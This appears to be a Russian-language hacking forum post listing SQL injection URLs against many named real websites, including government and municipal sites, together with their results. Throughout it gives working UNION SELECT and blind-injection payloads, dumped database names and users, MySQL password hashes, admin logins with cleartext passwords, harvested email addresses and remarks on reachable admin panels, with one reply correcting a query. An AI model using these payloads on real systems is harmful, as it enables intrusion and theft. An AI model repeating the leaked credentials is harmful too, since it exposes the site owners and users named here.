PHP: http://diglib1.cecs.missouri.edu/research2.php?rid=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* dbname: LabWebDB DbVersion: 5.0.22-standard Username: labweb@localhost
http://www.creativespace.at/jart/prj3/creativespace/website.jart?rel=de&reserve-mode=active&content-id=1191354857766&news_id=-1+union+select+1,concat_ws(0x3a3a,username,passwort,skype,email,wuser_status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+creative/* Выборка по юзерам. Логины, пасы, мыльники.
Code: http://www.automask.com/products/product_is.php?is_id=-99999999999+union+select+concat_ws(0x3a,user(),database(),version()),2,3 user():database():version() supertape@localhost:supertape:4.1.22-standard
ПончеГрекордингз)))) PHP: http://www.fatcityrecordings.com/fcr/homeRelease.php?rid=-72+union+select+1,2,3,4,5,upass,uadmin,8,9,10,11,12,13,14,15,uemail,17,18,19,20+from+users+limit+1,1-- Version: 5.0.67-community User: [email protected] Dbname: web160-f4tc1ty пасс:мыло dubwise:[email protected] r2d2c3po:[email protected]
http://www.moinesti.ro/showSubmenu.php?nrd=18+AND+SUBSTRING((select+y=1...3())>x=33...127-- y1=version y2=database y3=user x1=52,46,49,46,50,48,45,108,111,103,32,32 x2=109,111,105,110,101,115,116,105 x3=109,111,105,110,101,115,116,105,117,115,101,114,64,108,111,99,97,108,104,111,115,116 Version : 4.1.20-log Databse : moinesti User : moinestiuser@localhost
Code: http://www.strop-nn.ru/news/?id=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6,7,8-- Database Version : 4.0.25 Database name : strop-nn User name : strop-nn@localhost
Водоочистная Компания Code: http://www.waterprof.ru/news.php?nw=-113+union+select+1,2,3,4,concat(login,0x3a,passwd),6+from+users--
Code: http://dot.tucsonaz.gov/news/details.cfm?id=544+union+select+1,2,3,4,5/* version():4.1.22-log database():tdot user():tdot@localhost Code: http://dot.tucsonaz.gov/news/details.cfm?id=544+union+select+1,concat(user,0x3a,password),3,4,5+from+mysql.user/* Users: root:*16BFFB1610D863AA4041CD5366439903BB023784 repl:2b4dd6d150406475 tdot:2b4dd6d150406475 suntran:3a0cf9af161d9163 rnassi:234222a00634f453
PageRank = 6 Database Version: 5.0.45-log User name: [email protected] Database name: ujs_events admin : 664455ca5b1e50bc хэш MySQL: 664455ca5b1e50bc : t0ta11y Version: 4.1.22-standard User: wwwrfks_portfoli@localhost Database: wwwrfks_portfolio Version: 4.1.22-standard User: oldhall_daveh@localhost Database: oldhall_oldhall Version: 4.1.22 User: [email protected] Database: brayvw486 Version: 5.0.41-log User: [email protected] Database: venus2007_bddb
1soundtracks.com Code: http://www.1soundtracks.com/dead.php?id=-194213+union+select+user,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user Code: http://www.1soundtracks.com/dead.php?id=-194213+union+select+password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user Admin:7750f26e34d42062
Code: http://www.nswfb.nsw.gov.au/page.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- юзер/версия/бд: Code: 4.0.24-nt-max-log:[email protected]:vs161854_1 ----------------------------------------------------------------------------------------------------------------------- The End!
Code: http://www.neodecor.ru/news/index.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user())-- Database Version : 4.1.25-log Database name : db00071921 User name : 00071921@localhost -------------------------------------------------------+ Code: http://www.alfatv.ru/main.php?lang_id=1&id=13&_cat_id_=36&_ser_=2+union+select+concat _ws(0x3a,version(),database(),user())-- Database Version : 4.1.22-log Database name : wwwalfatvru_alfa User name : alfatv@localhost
http://www.primariarecas.ro/index.php?topic=page&id=-6+union+select+concat_ws(0x3a,version(),database(),user()) Database Version: 5.0.67-community Database name: recas_content User name: recas_webuser@localhost www.primariarecas.ro/admin login : recas password: nokia
Code: http://financialservicesconsulting.info/display.php?page=-1092+union+select+1,2,3,4,5,6,7,8,9,0/* Database Version: 4.1.22-log Database name: gfsc_db User name: gfsc_dbman@localhost
http://www.primariascornicesti.ro/index.php?modul=pagini&pagina=-8+union+select+1,concat_ws(0x3a,version(),database(),user()),3 Database Version: 5.0.32-Debian_7etch1-log Database name: scornicesti User name: scornicesti@localhost https://www.primariascornicesti.ro/admin вход свободный, тоьлко мало функциональная админка по мне
Code: http://vb.by/article.php?topic=7&article=-4652+union+select+1,version(),3 vb.by 82.209.195.16 ============================= ------- Версия MySQL: 5.0.51a-log ------- Имя базы: vb ------- Юзер: vb@hosting ------- @@basedir: /usr/local/ ------- @@datadir: /var/db/mysql/ ------- @@tmpdir: /var/tmp/ ------- @@version_compile_os: portbld-freebsd7.0 ------- mysql user: No ------- mysql password: No ------- file_priv: No ------- Кол-во таблиц в information_schema: 53 ------- Список таблиц из information_schema: ------- 1:CHARACTER_SETS 2:COLLATIONS 3:COLLATION_CHARACTER_SET_APPLICABILITY 4:COLUMNS 5:COLUMN_PRIVILEGES 6:KEY_COLUMN_USAGE 7:PROFILING 8:ROUTINES 9:SCHEMATA 10:SCHEMA_PRIVILEGES 11:STATISTICS 12:TABLES 13:TABLE_CONSTRAINTS 14:TABLE_PRIVILEGES 15:TRIGGERS 16:USER_PRIVILEGES 17:VIEWS 18:article 19:author 20:blog 21:blog_comment 22:cinema 23:comm_article 24:comm_baner 25:comm_date 26:comm_topic 27:comment 28:comment_block 29:concert 30:contest_comment 31:contest_image 32:contest_marks 33:contest_topic 34:exhibition 35:humor 36:mail 37:marks 38:online 39:online_person 40:online_question 41:photo 42:photo_comment 43:photo_image 44:project 45:publication 46:quest 47:quest_control 48:quest_poll 49:sport 50:theater 51:topic 52:who 53:who_link ------- ============================= Префикс для таблицы mail (если данные не выводятся, попробуйте вставить в source_table.txt название таблицы так: префикс.таблица ------- vb ------- Количество колонок из таблицы mail: ------- 5 ------- Список колонок из таблицы mail: ------- 1:id 2:date 3:email 4:smail 5:status ------- ============================= Количество значений из таблицы mail по полю id: ------- 8 ------- Данные по полям email,smail,status из таблицы mail: ------- [email protected]:1 [email protected]:1 [email protected]:1 [email protected]:1 [email protected]:1 [email protected]:1 [email protected]:1 [email protected]:1 админка под .htaccess
Агентство Бизнес Мониторинга Code: http://www.r52.ru/?rid=31+and+1=0+union+select+1,version(),3,4-- ______________________________________ Все о бизнесе в сфере услуг и производства России Code: http://www.portaluslug.ru/profile/-32227+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1--.html
Файл При Y, но ковычик слэшируются Code: http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,file_priv,5,6,7,8,9+from+mysql.user/* Пассы Code: root:57f7a24f45500f72:cru1ser
Сайт сервисного центра «Nokia» Code: http://nokiaservice.ru/?news_id=14'+and+substring((select+password+from+users+where+username='admin'),1,5)='aikon'/* http://nokiaservice.ru/admin/ ____________________________ Shaitan-Devil: 1. Ну и что, подумаешь, кавычки слэшируются. 2. file_priv "N", а не "Y". Правильный запрос: Code: http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,concat(user,0x3a,file_priv),5 ,6,7,8,9+from+mysql.user+limit+3,1/*
